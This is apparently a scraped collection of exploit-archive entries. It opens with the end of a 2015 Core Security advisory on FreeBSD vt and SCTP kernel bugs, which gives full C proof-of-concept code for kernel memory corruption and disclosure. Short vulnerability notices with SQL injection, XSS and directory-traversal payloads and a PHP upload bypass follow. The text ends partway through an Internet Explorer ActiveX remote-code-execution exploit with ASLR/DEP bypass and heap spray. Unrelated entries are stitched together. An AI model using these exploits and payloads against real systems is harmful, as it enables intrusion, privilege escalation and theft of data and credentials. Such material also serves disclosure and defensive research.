sctp_ss_rrp_select, .sctp_ss_scheduled = sctp_ss_default_scheduled, .sctp_ss_packet_done = sctp_ss_rrp_packet_done, .sctp_ss_get_value = sctp_ss_default_get_value, .sctp_ss_set_value = sctp_ss_default_set_value }, /* SCTP_SS_PRIORITY */ { .sctp_ss_init = sctp_ss_default_init, .sctp_ss_clear = sctp_ss_prio_clear, .sctp_ss_init_stream = sctp_ss_prio_init_stream, .sctp_ss_add_to_stream = sctp_ss_prio_add, .sctp_ss_is_empty = sctp_ss_default_is_empty, .sctp_ss_remove_from_stream = sctp_ss_prio_remove, .sctp_ss_select_stream = sctp_ss_prio_select, .sctp_ss_scheduled = sctp_ss_default_scheduled, .sctp_ss_packet_done = sctp_ss_default_packet_done, .sctp_ss_get_value = sctp_ss_prio_get_value, .sctp_ss_set_value = sctp_ss_prio_set_value }, /* SCTP_SS_FAIR_BANDWITH */ { .sctp_ss_init = sctp_ss_default_init, .sctp_ss_clear = sctp_ss_fb_clear, .sctp_ss_init_stream = sctp_ss_fb_init_stream, .sctp_ss_add_to_stream = sctp_ss_fb_add, .sctp_ss_is_empty = sctp_ss_default_is_empty, .sctp_ss_remove_from_stream = sctp_ss_fb_remove, .sctp_ss_select_stream = sctp_ss_fb_select, .sctp_ss_scheduled = sctp_ss_fb_scheduled, .sctp_ss_packet_done = sctp_ss_default_packet_done, .sctp_ss_get_value = sctp_ss_default_get_value, .sctp_ss_set_value = sctp_ss_default_set_value }, /* SCTP_SS_FIRST_COME */ { .sctp_ss_init = sctp_ss_fcfs_init, .sctp_ss_clear = sctp_ss_fcfs_clear, .sctp_ss_init_stream = sctp_ss_fcfs_init_stream, .sctp_ss_add_to_stream = sctp_ss_fcfs_add, .sctp_ss_is_empty = sctp_ss_fcfs_is_empty, .sctp_ss_remove_from_stream = sctp_ss_fcfs_remove, .sctp_ss_select_stream = sctp_ss_fcfs_select, .sctp_ss_scheduled = sctp_ss_default_scheduled, .sctp_ss_packet_done = sctp_ss_default_packet_done, .sctp_ss_get_value = sctp_ss_default_get_value, .sctp_ss_set_value = sctp_ss_default_set_value } }; -----/ Note that the value for the 'sctp_ss_set_value' field is *almost* always set to 'sctp_ss_default_set_value', which is just a dummy function defined in 'sys/netinet/sctp_ss_functions.c': /----- static int sctp_ss_default_set_value(struct sctp_tcb *stcb SCTP_UNUSED, struct sctp_association *asoc SCTP_UNUSED, struct sctp_stream_out *strq SCTP_UNUSED, uint16_t value SCTP_UNUSED) { /* Nothing to be done here */ return (-1); } -----/ The only case in which the 'sctp_ss_set_value' field is set to a different value is in the 4th element of the array, which corresponds to the 'SCTP_SS_PRIORITY' socket option; in that case, the function pointer is set to 'sctp_ss_prio_set_value', which is a function defined in 'sys/netinet/sctp_ss_functions.c': /----- static int sctp_ss_prio_set_value(struct sctp_tcb *stcb, struct sctp_association *asoc, struct sctp_stream_out *strq, uint16_t value) { if (strq == NULL) { return (-1); } strq->ss_params.prio.priority = value; sctp_ss_prio_remove(stcb, asoc, strq, NULL, 1); sctp_ss_prio_add(stcb, asoc, strq, NULL, 1); return (1); } -----/ The 'value' parameter is fully controlled by the attacker, and the actual value of the 'strq' pointer parameter is the address '&stcb->asoc.strmout[av->stream_id]' in which the attacker can set the 'av->stream_id' index beyond the boundaries of the array, so this function will provide a write-what-where memory corruption primitive when doing the 'strq->ss_params.prio.priority = value' assignment. This memory corruption vulnerability allows a local unprivileged attacker to overwrite kernel memory outside of the 'stcb->asoc.strmout' array with an arbitrary 'uint16_t' value. In order to make use of the 'sctp_ss_prio_set_value' function, the attacker needs to set up the 'stcb->asoc.ss_functions' struct with the function pointers belonging to the 'SCTP_SS_PRIORITY' socket option. This can be done by hitting the following code in the 'sctp_setopt' function; as can be seen, the 'stcb->asoc.ss_functions' struct can be properly set up for the attack by setting an 'SCTP_PLUGGABLE_SS' socket option with an option value of type 'struct sctp_assoc_value' having its 'assoc_value' field set to 'SCTP_SS_PRIORITY' (see the 'stcb->asoc.ss_functions = sctp_ss_functions[av->assoc_value] ' statement): /----- case SCTP_PLUGGABLE_SS: { struct sctp_assoc_value *av; SCTP_CHECK_AND_CAST(av, optval, struct sctp_assoc_value, optsize); /* Checks if av->assoc_value is a valid index within the sctp_ss_functions array */ if ((av->assoc_value != SCTP_SS_DEFAULT) && (av->assoc_value != SCTP_SS_ROUND_ROBIN) && (av->assoc_value != SCTP_SS_ROUND_ROBIN_PACKET) && (av->assoc_value != SCTP_SS_PRIORITY) && (av->assoc_value != SCTP_SS_FAIR_BANDWITH) && (av->assoc_value != SCTP_SS_FIRST_COME)) { SCTP_LTRACE_ERR_RET(inp, NULL, NULL, SCTP_FROM_SCTP_USRREQ, EINVAL); error = EINVAL; break; } SCTP_FIND_STCB(inp, stcb, av->assoc_id); if (stcb) { stcb->asoc.ss_functions.sctp_ss_clear(stcb, &stcb->asoc, 1, 1); /* The function pointers struct is set up here!!! */ stcb->asoc.ss_functions = sctp_ss_functions[av->assoc_value]; stcb->asoc.stream_scheduling_module = av->assoc_value; stcb->asoc.ss_functions.sctp_ss_init(stcb, &stcb->asoc, 1); SCTP_TCB_UNLOCK(stcb); -----/ 8.3. *FreeBSD SCTP Socket SCTP_SS_VALUE Kernel Memory Disclosure Vulnerability* [CVE-2014-8612] The third vulnerability is closely related to the second one. The FreeBSD kernel is prone to a kernel memory disclosure when reading the value of the 'SCTP_SS_VALUE' SCTP socket option via the 'getsockopt' system call, which allows local unprivileged attackers to read 16-bit values belonging to the kernel memory space. The handling of the 'getsockopt' system call at the SCTP level is performed by the function 'sctp_getopt' [file 'sys/netinet/sctp_userreq.c']: /----- static int sctp_getopt(struct socket *so, int optname, void *optval, size_t *optsize, void *p) { [...] switch (optname) { [...] case SCTP_SS_VALUE: { struct sctp_stream_value *av; SCTP_CHECK_AND_CAST(av, optval, struct sctp_stream_value, *optsize); SCTP_FIND_STCB(inp, stcb, av->assoc_id); if (stcb) { if (stcb->asoc.ss_functions.sctp_ss_get_value(stcb, &stcb->asoc, &stcb->asoc.strmout[av->stream_id], &av->stream_value) < 0) { -----/ When handling the 'SCTP_SS_VALUE' socket option, the 'optval' option value (which is fully controlled by the local attacker), is casted to the 'struct sctp_stream_value *' type and stored into the 'av' variable by using the 'SCTP_CHECK_AND_CAST' macro. After that, if the 'sctb' pointer is not 'NULL' (condition that can be achieved by having the SCTP socket in a *connected* state), the 'stcb->asoc.ss_functions.sctp_ss_get_value' function pointer is called. The third argument for this function is '&stcb->asoc.strmout[av->stream_id]'. As can be seen, the unstrusted 'av->stream_id' value (which is fully controlled by the local attacker) is used as an index within the 'stcb->asoc.strmout' array without properly checking if it's within the bounds of the array. The default value for the 'sctp_ss_get_value' function pointer is 'sctp_ss_default_get_value', which is just a dummy function defined in 'sys/netinet/sctp_ss_functions.c': /----- static int sctp_ss_default_get_value(struct sctp_tcb *stcb SCTP_UNUSED, struct sctp_association *asoc SCTP_UNUSED, struct sctp_stream_out *strq SCTP_UNUSED, uint16_t * value SCTP_UNUSED) { /* Nothing to be done here */ return (-1); } -----/ The only useful possible value for this function pointer is 'sctp_ss_prio_get_value', which belongs to the function pointers of the 'SCTP_SS_PRIORITY' socket option: /----- static int sctp_ss_prio_get_value(struct sctp_tcb *stcb SCTP_UNUSED, struct sctp_association *asoc SCTP_UNUSED, struct sctp_stream_out *strq, uint16_t * value) { if (strq == NULL) { return (-1); } *value = strq->ss_params.prio.priority; return (1); } -----/ The actual value of the 'strq' pointer parameter is the address '&stcb->asoc.strmout[av->stream_id]' in which the attacker can set the 'av->stream_id' index beyond the boundaries of the array, so this function will allow a local unprivileged attacker to read an 'uint16_t' value belonging to the kernel memory outside of the 'stcb->asoc.strmout' array when doing the '*value = strq->ss_params.prio.priority' assignment. In order to make use of the 'sctp_ss_prio_get_value' function, the attacker needs to set up the 'stcb->asoc.ss_functions' struct with the function pointers belonging to the 'SCTP_SS_PRIORITY' socket option, as it was previously explained for the second vulnerability. 8.4. *Proof of Concept* The following code is a Proof of Concept for the first vulnerability: /----- #include <stdio.h> #include <sys/consio.h> #include <sys/ioctl.h> #include <fcntl.h> #include <stdlib.h> #include <unistd.h> int main(int argc, char **argv){ int fd; printf("** FreeBSD vt Driver VT_WAITACTIVE Sign Conversion Vulnerability PoC **\n"); if (argc < 2){ printf("\nUsage: ./poc_vt </dev/ttyv*>, where ttyv* is your current virtual terminal.\n"); printf("\nExample: ./poc_vt /dev/ttyv1\n\n"); exit(1); } fd = open(argv[1], O_RDONLY); if (fd == -1){ perror("open"); exit(1); } /* 0x90919293 is a negative number when it's interpreted as a signed int, thus it will bypass the * (signed) boundary check that tries to guarantee that this value is not greater than VT_MAXWINDOWS (12). * This value will be ultimately used as an index to access the vd->vd_windows array. */ if (ioctl(fd, VT_WAITACTIVE, (void *) 0x90919293) == -1){ perror("ioctl"); } close(fd); return 0; } -----/ The following code is a Proof of Concept for the second vulnerability: /----- #include <sys/types.h> #include <sys/socket.h> #include <netinet/in.h> #include <netinet/sctp.h> #include <netinet/sctp_uio.h> #include <arpa/inet.h> #include <string.h> #include <stdio.h> #include <stdlib.h> #include <unistd.h> #define PORT 4444 #define ADDR "127.0.0.1" int main(int argc, char *argv[]) { int fd; struct sockaddr_in addr; struct sctp_initmsg init; struct sctp_stream_value stream_value; struct sctp_assoc_value assoc_value; socklen_t opt_len; printf("** FreeBSD SCTP Socket SCTP_SS_VALUE Memory Corruption Vulnerability PoC **\n"); if ((fd = socket(AF_INET, SOCK_STREAM, IPPROTO_SCTP)) < 0) { perror("socket"); goto out; } memset(&init, 0, sizeof(init)); init.sinit_num_ostreams = 2048; if (setsockopt(fd, IPPROTO_SCTP, SCTP_INITMSG, &init, (socklen_t)sizeof(struct sctp_initmsg)) < 0) { perror("SCTP_INITMSG"); goto out; } memset(&addr, 0, sizeof(addr)); #ifdef HAVE_SIN_LEN addr.sin_len = sizeof(struct sockaddr_in); #endif addr.sin_family = AF_INET; addr.sin_port = htons(PORT); addr.sin_addr.s_addr = inet_addr(ADDR); if (connect(fd, (struct sockaddr *)&addr, sizeof(struct sockaddr_in)) < 0) { perror("connect"); goto out; } /* Set up the stcb->asoc.ss_functions struct with the function pointers belonging to the SCTP_SS_PRIORITY socket option */ memset(&assoc_value, 0, sizeof(assoc_value)); assoc_value.assoc_value = SCTP_SS_PRIORITY; assoc_value.assoc_id = SCTP_CURRENT_ASSOC; if (setsockopt(fd, IPPROTO_SCTP, SCTP_PLUGGABLE_SS, &assoc_value, (socklen_t)sizeof(struct sctp_assoc_value)) < 0){ perror("setting up function pointers"); goto out; } memset(&stream_value, 0, sizeof(stream_value)); stream_value.assoc_id = SCTP_CURRENT_ASSOC; /* * stream_id will be used as an index into the stcb->asoc.strmout array without performing bounds checking. * stream_value will be written to the calculated address. */ stream_value.stream_id = 0xFFFF; stream_value.stream_value = 0x4142; /* Triggering the vulnerability... */ if (setsockopt(fd, IPPROTO_SCTP, SCTP_SS_VALUE, &stream_value, (socklen_t)sizeof(struct sctp_stream_value)) < 0){ perror("triggering the vulnerability"); goto out; } out: if (close(fd) < 0) { perror("close"); } return(0); } -----/ The following code is a Proof of Concept for the third vulnerability: /----- #include <sys/types.h> #include <sys/socket.h> #include <netinet/in.h> #include <netinet/sctp.h> #include <netinet/sctp_uio.h> #include <arpa/inet.h> #include <string.h> #include <stdio.h> #include <stdlib.h> #include <unistd.h> #define PORT 4444 #define ADDR "127.0.0.1" int main(int argc, char *argv[]) { int fd; struct sockaddr_in addr; struct sctp_initmsg init; struct sctp_stream_value stream_value; struct sctp_assoc_value assoc_value; socklen_t opt_len; printf("** FreeBSD SCTP Socket SCTP_SS_VALUE Kernel Memory Disclosure Vulnerability **\n"); if ((fd = socket(AF_INET, SOCK_STREAM, IPPROTO_SCTP)) < 0) { perror("socket"); goto out; } memset(&init, 0, sizeof(init)); init.sinit_num_ostreams = 2048; if (setsockopt(fd, IPPROTO_SCTP, SCTP_INITMSG, &init, (socklen_t)sizeof(struct sctp_initmsg)) < 0) { perror("SCTP_INITMSG"); goto out; } memset(&addr, 0, sizeof(addr)); #ifdef HAVE_SIN_LEN addr.sin_len = sizeof(struct sockaddr_in); #endif addr.sin_family = AF_INET; addr.sin_port = htons(PORT); addr.sin_addr.s_addr = inet_addr(ADDR); if (connect(fd, (struct sockaddr *)&addr, sizeof(struct sockaddr_in)) < 0) { perror("connect"); goto out; } /* Set up the stcb->asoc.ss_functions struct with the function pointers belonging to the SCTP_SS_PRIORITY socket option */ memset(&assoc_value, 0, sizeof(assoc_value)); assoc_value.assoc_value = SCTP_SS_PRIORITY; assoc_value.assoc_id = SCTP_CURRENT_ASSOC; if (setsockopt(fd, IPPROTO_SCTP, SCTP_PLUGGABLE_SS, &assoc_value, (socklen_t)sizeof(struct sctp_assoc_value)) < 0){ perror("setting up function pointers"); goto out; } memset(&stream_value, 0, sizeof(stream_value)); opt_len = sizeof(stream_value); stream_value.assoc_id = SCTP_CURRENT_ASSOC; /* stream_id will be used as an index into the stcb->asoc.strmout array without performing bounds checking. */ stream_value.stream_id = 0x400; /* Triggering the vulnerability... */ if (getsockopt(fd, IPPROTO_SCTP, SCTP_SS_VALUE, &stream_value, &opt_len) < 0){ perror("triggering the vulnerability"); goto out; } printf("[*] Value leaked from kernel: 0x%04X\n", stream_value.stream_value); out: if (close(fd) < 0) { perror("close"); } return(0); } -----/ Note that both the second and third PoCs try to connect to a dummy SCTP server listening on localhost on port 4444, since the SCTP socket needs to be in a 'connected' state in order to trigger the vulnerabilities. The following code, based on the example code published here[5], can be used to run a simple SCTP server listening on port 4444: /----- #include <sys/types.h> #include <sys/socket.h> #include <netinet/in.h> #include <netinet/sctp.h> #include <arpa/inet.h> #include <string.h> #include <stdio.h> #include <unistd.h> #define BUFFER_SIZE (1<<16) #define PORT 4444 #define ADDR "127.0.0.1" int main(int argc, char *argv[]) { int fd, n, flags; struct sockaddr_in addr; socklen_t from_len; struct sctp_sndrcvinfo sinfo; char buffer[BUFFER_SIZE]; struct sctp_event_subscribe event; if ((fd = socket(AF_INET, SOCK_SEQPACKET, IPPROTO_SCTP)) < 0) { perror("socket"); goto out; } memset(&event, 1, sizeof(struct sctp_event_subscribe)); if (setsockopt(fd, IPPROTO_SCTP, SCTP_EVENTS, &event, sizeof(struct sctp_event_subscribe)) < 0) { perror("setsockopt"); goto out; } memset(&addr, 0, sizeof(struct sockaddr_in)); #ifdef HAVE_SIN_LEN addr.sin_len = sizeof(struct sockaddr_in); #endif addr.sin_family = AF_INET; addr.sin_port = htons(PORT); addr.sin_addr.s_addr = inet_addr(ADDR); if (bind(fd, (struct sockaddr *)&addr, sizeof(struct sockaddr_in)) < 0) { perror("bind"); goto out; } if (listen(fd, 1) < 0) { perror("listen"); goto out; } while (1) { flags = 0; memset(&addr, 0, sizeof(struct sockaddr_in)); from_len = (socklen_t)sizeof(struct sockaddr_in); memset(&sinfo, 0, sizeof(struct sctp_sndrcvinfo)); n = sctp_recvmsg(fd, (void *)buffer, BUFFER_SIZE, (struct sockaddr *)&addr, &from_len, &sinfo, &flags); if (flags & MSG_NOTIFICATION) { printf("Notification received.\n"); } else { printf("Msg of length %d received from %s:%u on stream %d, PPID %d.\n", n, inet_ntoa(addr.sin_addr), ntohs(addr.sin_port),sinfo.sinfo_stream, ntohl(sinfo.sinfo_ppid)); } } out: if (close(fd) < 0) { perror("close"); } return (0); } -----/ 9. *Report Timeline* . 2015-01-15: Initial notification sent to FreeBSD. Publication date set to Feb 16, 2015. . 2015-01-15: FreeBSD confirms reception of the report and requests the draft version of the advisory. They clarify that they usually aim for Tuesday releases depending on the severity of the problem. . 2015-01-15: Core Security sends a draft version of the advisory to the vendor and requests to be informed once they finish reviewing the vulnerabilities. . 2015-01-26: Core Security requests a status report regarding their review of the vulnerabilities and the estimated publication date. . 2015-01-26: FreeBSD confirms the bugs, but informs us that they'll only publish a security advisory for the SCTP Socket SCTP_SS_VALUE Memory Corruption and Kernel Memory Disclosure vulnerabilities. For the "vt Driver VT_WAITACTIVE Sign Conversion Vulnerability" they will commit a normal change and then release an "Errata Notice" informing the fix. They set the publication date for 27th January, 2015. . 2015-01-26: Core Security informs that understands their position regarding the vt Driver VT_WAITACTIVE Sign Conversion issue, but we will nevertheless publish thew bug in the advisory because we consider it a vulnerability. We accepted their offer of sharing CVE IDs. . 2015-01-26: FreeBSD confirms they have available CVE IDs and ask if we want to use IDs from 2014 or 2015. . 2015-01-27: FreeBSD informs us that after going through their mail archive they found out that the same issue was reported by Google and that they missed it. They inform us that they will use only one CVE ID for the two SCTP issues because they state they are of the same nature. . 2015-01-27: Core Security informs that will assign a the CVE ID CVE-2014-0998 to the vt(4) vulnerability and we requested the date and time they plan to release the fix and advisory. . 2015-01-27: FreeBSD informs they will publish the fix and advisory today. . 2015-01-27: Advisory CORE-2015-0003 published. 10. *References* [1] https://www.freebsd.org/releases/10.1R/relnotes.html#new [2] https://www.freebsd.org/cgi/man.cgi?query=vt&sektion=4 [3] https://wiki.freebsd.org/Newcons [4] https://www.freebsd.org/cgi/man.cgi?query=sctp&sektion=4 [5] http://www.bsdcan.org/2008/schedule/attachments/44_bsdcan_sctp.pdf [6] https://security.FreeBSD.org/advisories/FreeBSD-SA-15:02.kmem.asc 11. *About CoreLabs* CoreLabs, the research center of Core Security, is charged with anticipating the future needs and requirements for information security technologies. We conduct our research in several important areas of computer security including system vulnerabilities, cyber attack planning and simulation, source code auditing, and cryptography. Our results include problem formalization, identification of vulnerabilities, novel solutions and prototypes for new technologies. CoreLabs regularly publishes security advisories, technical papers, project information and shared software tools for public use at: http://corelabs.coresecurity.com. 12. *About Core Security Technologies* Core Security Technologies enables organizations to get ahead of threats with security test and measurement solutions that continuously identify and demonstrate real-world exposures to their most critical assets. Our customers can gain real visibility into their security standing, real validation of their security controls, and real metrics to more effectively secure their organizations. Core Security's software solutions build on over a decade of trusted research and leading-edge threat expertise from the company's Security Consulting Services, CoreLabs and Engineering groups. Core Security Technologies can be reached at +1 (617) 399-6980 or on the Web at: http://www.coresecurity.com. 13. *Disclaimer* The contents of this advisory are copyright (c) 2015 Core Security and (c) 2015 CoreLabs, and are licensed under a Creative Commons Attribution Non-Commercial Share-Alike 3.0 (United States) License: http://creativecommons.org/licenses/by-nc-sa/3.0/us/ 14. *PGP/GPG Keys* This advisory has been signed with the GPG key of Core Security advisories team, which is available for download at http://www.coresecurity.com/files/attachments/core_security_advisories.asc.

source: https://www.securityfocus.com/bid/48647/info Sphider is prone to multiple SQL-injection vulnerabilities because it fails to sufficiently sanitize user-supplied data before using it in an SQL query. Exploiting these issues could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database. The following example input is available: Username: ' or 0=0 # Password: ' or 0=0 #

source: https://www.securityfocus.com/bid/48642/info The Alice Modem is prone to a cross-site scripting vulnerability and a denial-of-service vulnerability because the device fails to properly handle user-supplied input. An attacker may leverage these issues to cause a denial-of-service condition or to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. Successfully exploiting the cross-site scripting issue may allow the attacker to steal cookie-based authentication credentials and to launch other attacks. http://www.example.com/natAdd?apptype=userdefined&rulename=%22%3E%3Cscript%3Ealert(%22XSS%22)%3C/script%3E&waninterface=ipwan&inthostip1=192&inthostip2=168&inthostip3=1&inthostip4=99 http://www.example.com/natAdd?apptype=userdefined&rulename=%3E%3Cscript%3Ealert%28%22XSS%22%29%3C%2Fscript%3E%3Cx+y=&waninterface=ipwan&inthostip1=192&inthostip2=168&inthostip3=1&inthostip4=199&protocol1=proto_6&extportstart1=1&extportend1=1&intportstart1=1&intportend1=1&protocol2=proto_6&extportstart2=&extportend2=&intportstart2=&intportend2=&protocol3=proto_6&extportstart3=&extportend3=&intportstart3=&intportend3=

source: https://www.securityfocus.com/bid/48651/info Flowplayer is prone to a cross-site scripting vulnerability because it fails to properly sanitize user-supplied input before using it in dynamically generated content. An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and to launch other attacks. Flowplayer 3.2.7 is vulnerable; other versions may also be affected. http://www.example.com/flowplayer/flowplayer-3.2.7.swf?config={%22clip%22:{%22url%22:%22http://www.example.com/vod/demo.flowplayervod/flowplayer-700.flv%22,%20%22linkUrl%22:%22javascript:alert%28String.fromCharCode%2888,83,83%29%29;alert%28document.cookie%29%22},%22screen%22:{%22height%22:%22100pct%22,%22top%22:0},%22plugins%22:{%22controls%22:{%22timeColor%22:%22#ffffff%22,%22borderRadius%22:%220px%22,%22buttonOffColor%22:%22rgba%28130,130,130,1%29%22,%22bufferGradient%22:%22none%22,%22sliderColor%22:%22#000000%22,%22zIndex%22:1,%22backgroundColor%22:%22rgba%280,%200,%200,%200%29%22,%22scrubberHeightRatio%22:0.6,%22tooltipTextColor%22:%22#ffffff%22,%22volumeSliderGradient%22:%22none%22,%22spacing%22:{%22time%22:6,%22volume%22:8,%22all%22:2},%22sliderGradient%22:%22none%22,%22timeBorderRadius%22:20,%22timeBgHeightRatio%22:0.8,%22volumeSliderHeightRatio%22:0.6,%22progressGradient%22:%22none%22,%22height%22:26,%22volumeColor%22:%22#4599ff%22,%22tooltips%22:{%22marginBottom%22:5,%22buttons%22:false},%22timeSeparator%22:%22%20%22,%22name%22:%22controls%22,%22volumeBarHeightRatio%22:0.2,%22opacity%22:1,%22timeFontSize%22:12,%22left%22:%2250pct%22,%22tooltipColor%22:%22rgba%280,%200,%200,%200%29%22,%22bufferColor%22:%22#a3a3a3%22,%22volumeSliderColor%22:%22#ffffff%22,%22border%22:%220px%22,%22buttonColor%22:%22#ffffff%22,%22durationColor%22:%22#b8d9ff%22,%22autoHide%22:{%22enabled%22:true,%22hideDelay%22:500,%22hideStyle%22:%22fade%22,%22mouseOutDelay%22:500,%22hideDuration%22:400,%22fullscreenOnly%22:true},%22backgroundGradient%22:%22none%22,%22width%22:%22100pct%22,%22sliderBorder%22:%221px%20solid%20rgba%28128,%20128,%20128,%200.7%29%22,%22display%22:%22block%22,%22buttonOverColor%22:%22#ffffff%22,%22url%22:%22flowplayer.controls-3.2.5.swf%22,%22timeBorder%22:%220px%20solid%20rgba%280,%200,%200,%200.3%29%22,%22progressColor%22:%22#4599ff%22,%22timeBgColor%22:%22rgb%280,%200,%200,%200%29%22,%22scrubberBarHeightRatio%22:0.2,%22bottom%22:0,%22builtIn%22:false,%22volumeBorder%22:%221px%20solid%20rgba%28128,%20128,%20128,%200.7%29%22,%22margins%22:[2,12,2,12]}}}

source: https://www.securityfocus.com/bid/48669/info TCExam is prone to multiple cross-site scripting vulnerabilities because it fails to properly sanitize user-supplied input. An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may let the attacker steal cookie-based authentication credentials and launch other attacks. TCExam 11.2.009, 11.2.010 and 11.2.011 are vulnerable; other versions may also be affected. XSS: GET http://www.example.com/tcexam/admin/code/{script}.php?{parameter}={value}"><script>alert(1)</script> XSS: POST http://www.example.com/tcexam/admin/code/{script}.php HTTP/1.0 - {parameter}={value}<script>alert(1)</script>&{parameter}={value} XSS URI: GET http://www.example.com/tcexam/admin/code/index.php?zsl=>"><script>alert(1)</script> XSS Path: GET http://www.example.com/tcexam/admin/code/?=>"&#039;><script>alert(1)</script>

source: https://www.securityfocus.com/bid/48672/info Chyrp is prone to multiple cross-site scripting vulnerabilities, a local file-include vulnerability, an arbitrary file-upload vulnerability, and a directory-traversal vulnerability. An attacker may leverage these issues to execute arbitrary script code on an affected computer and in the browser of an unsuspecting user in the context of the affected site, steal cookie-based authentication credentials, open or run arbitrary files in the context of the webserver process, and gain access to sensitive information. Chyrp 2.1 is vulnerable; other versions may also be affected. http://www.example.com/admin/help.php?title=[XSS]&body=[XSS]

source: https://www.securityfocus.com/bid/48672/info Chyrp is prone to multiple cross-site scripting vulnerabilities, a local file-include vulnerability, an arbitrary file-upload vulnerability, and a directory-traversal vulnerability. An attacker may leverage these issues to execute arbitrary script code on an affected computer and in the browser of an unsuspecting user in the context of the affected site, steal cookie-based authentication credentials, open or run arbitrary files in the context of the webserver process, and gain access to sensitive information. Chyrp 2.1 is vulnerable; other versions may also be affected. http://www.example.comincludes/javascript.php?action=[XSS]

source: https://www.securityfocus.com/bid/48672/info Chyrp is prone to multiple cross-site scripting vulnerabilities, a local file-include vulnerability, an arbitrary file-upload vulnerability, and a directory-traversal vulnerability. An attacker may leverage these issues to execute arbitrary script code on an affected computer and in the browser of an unsuspecting user in the context of the affected site, steal cookie-based authentication credentials, open or run arbitrary files in the context of the webserver process, and gain access to sensitive information. Chyrp 2.1 is vulnerable; other versions may also be affected. http://www.example.com/?action=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpassword%00

source: https://www.securityfocus.com/bid/48672/info Chyrp is prone to multiple cross-site scripting vulnerabilities, a local file-include vulnerability, an arbitrary file-upload vulnerability, and a directory-traversal vulnerability. An attacker may leverage these issues to execute arbitrary script code on an affected computer and in the browser of an unsuspecting user in the context of the affected site, steal cookie-based authentication credentials, open or run arbitrary files in the context of the webserver process, and gain access to sensitive information. Chyrp 2.1 is vulnerable; other versions may also be affected. http://www.example.com/includes/lib/gz.php?file=/themes/../../../../../../../../../etc/passwd

source: https://www.securityfocus.com/bid/48672/info Chyrp is prone to multiple cross-site scripting vulnerabilities, a local file-include vulnerability, an arbitrary file-upload vulnerability, and a directory-traversal vulnerability. An attacker may leverage these issues to execute arbitrary script code on an affected computer and in the browser of an unsuspecting user in the context of the affected site, steal cookie-based authentication credentials, open or run arbitrary files in the context of the webserver process, and gain access to sensitive information. Chyrp 2.1 is vulnerable; other versions may also be affected. C: Appended ;*.php in script for the add photo feather (http://www.example.com/admin/?action=write_post&feather=photo) using intercepting proxy <script type="text/javascript"> $(function(){ $("#photo").clone().attr("id", "photo_fake").addClass("swfupload_button").insertBefore("#photo") photo = new SWFUpload({ upload_url : "http://www.example.com/chyrp_v2.0/modules/swfupload/upload_handler.php", flash_url : "http://www.example.com/chyrp_v2.0/modules/swfupload/lib/swfupload.swf", post_params: {"PHPSESSID" : "5o3bnghnijk4hlr7vnshi3vb76", "PHPSESSNAME" : "ChyrpSession", "ajax" : "true" }, file_size_limit : "100 MB", file_types : "*.jpg;*.jpeg;*.png;*.gif;*.bmp;*.php", <-- #MODIFY! file_types_description : "All Files", file_queue_error_handler : fileQueueError, file_dialog_complete_handler : fileDialogComplete, upload_start_handler : uploadStart, upload_progress_handler : uploadProgress, upload_error_handler : uploadError, upload_success_handler : uploadSuccess, button_placeholder_id : "photo", button_width : $("#photo_fake").width(), button_height : $("#photo_fake").height(), button_action : SWFUpload.BUTTON_ACTION.SELECT_FILES, upload_complete_handler : uploadComplete }) $("#SWFUpload_0") .css({ position: "absolute", top: $("#photo_fake").offset().top, left: $("#photo_fake").offset().left }) .before('<div id="progress"><div class="back"><div class="fill"></div><div class="clear"></div></div></div>') }) </script>

<!DOCTYPE HTML> <!-- ############################################################################### * * Exploit Title: X360 VideoPlayer ActiveX Control RCE Full ASLR & DEP Bypass * Author: Rh0 * Date: Jan 30 2015 * Affected Software: X360 VideoPlayer ActiveX Control 2.6 (VideoPlayer.ocx) * Vulnerability: Buffer Overflow in Data Section * Tested on: Internet Explorer 10 32-bit (Windows 7 64-bit in VirtualBox) * Software Links: http://www.x360soft.com/demo/videoplayersetup.exe http://download.cnet.com/X360-Video-Player-ActiveX-Control/3000-2170_4-10581185.html * Detailed writeup: https://rh0dev.github.io/blog/2015/fun-with-info-leaks/ * ############################################################################### * Information about VideoPlayer.ocx * ################################### md5sum: f9f2d32ae0e4d7b5c19692d0753451fb Class VideoPlayer GUID: {4B3476C6-185A-4D19-BB09-718B565FA67B} Number of Interfaces: 1 Default Interface: _DVideoPlayer RegKey Safe for Script: True RegkeySafe for Init: True KillBitSet: False * NOTES * ######### *) When passing an overlong string to the ActiveX object's "SetText" method, a buffer overflow in the data section occurs. It allows overwriting a subsequent pointer that can be used in a controlled memcpy when dispatching the object's "SetFontName" method. With this arbitrary write, array structures can be manipulated to gain access to complete process memory. Equipped with this capability, necessary information can be leaked and manipulated to execute arbitrary code remotely. *) Comment in the alert messages to see some leaks ;) *) This is PoC Code: If it does not work for you, clear IE's history and try again. Tested against mshtml.dll and jscript9.dll version 10.0.9200.17183 *) Inspired by: "http://blog.exodusintel.com/2013/12/09/a-browser-is-only-as-strong-as-its-weakest-byte-part-2/" "http://ifsec.blogspot.de/2013/11/exploiting-internet-explorer-11-64-bit.html" "https://cansecwest.com/slides/2014/The Art of Leaks - read version - Yoyo.pdf" "https://cansecwest.com/slides/2014/ROPs_are_for_the_99_CanSecWest_2014.pdf" "https://github.com/exp-sky/HitCon-2014-IE-11-0day-Windows-8.1-Exploit/blob/master/IE 11 0day & Windows 8.1 Exploit.pdf" --> <html> <body> <button onclick=run()>runme</button> <script> function run(){ /* VideoPlayer.ocx image has the rebase flag set => It's mapped to another base per process run */ /* create its vulnerable ActiveX object (as HTMLObjectElement) */ var obj = document.createElement("object"); obj.setAttribute("classid", "clsid:4B3476C6-185A-4D19-BB09-718B565FA67B"); /* amount of arrays to create on the heap */ nrArrays = 0x1000 /* size of data in one array block: 0xefe0 bytes => subract array header (0x20) and space for typed array headers (0x1000) from 0x10000 */ arrSize = (0x10000-0x20-0x1000)/4 /* heap array container will hold our heap sprayed data */ arr = new Array(nrArrays) /* use one buffer for all typed arrays */ intArrBuf = new ArrayBuffer(4) /* spray the heap with array data blocks and subsequent typed array headers of type Uint32Array */ k = 0 while(k < nrArrays){ /* create "jscript9!Js::JavascriptArray" with blocksize 0xf000 (data aligned at 0xXXXX0020) */ arr[k] = new Array(arrSize); /* fill remaining page (0x1000) after array data with headers of 